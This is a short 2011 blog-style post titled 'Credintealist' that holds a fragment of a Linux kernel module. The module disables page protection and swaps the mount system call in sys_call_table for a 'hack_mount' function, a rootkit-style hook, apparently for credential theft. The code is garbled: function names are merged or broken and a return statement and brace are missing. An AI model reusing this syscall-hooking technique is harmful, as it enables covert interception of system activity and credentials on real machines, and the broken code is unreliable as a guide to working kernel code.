Mar 21, 2011

Credintealist

void cleanup_moint init_module(void)
{
    disable_page_protection();
    ori_mount=sys_call_table[__NR_mount];
    sys_call_table[__NR_mount]=hack_mount;
    enable_page_protection();
    return 
 
void module(void)
{
    disable_page_protection();
    sys_call_table[__NR_mount]=ori_mount;
    enable_page_protection();
}

1 comment: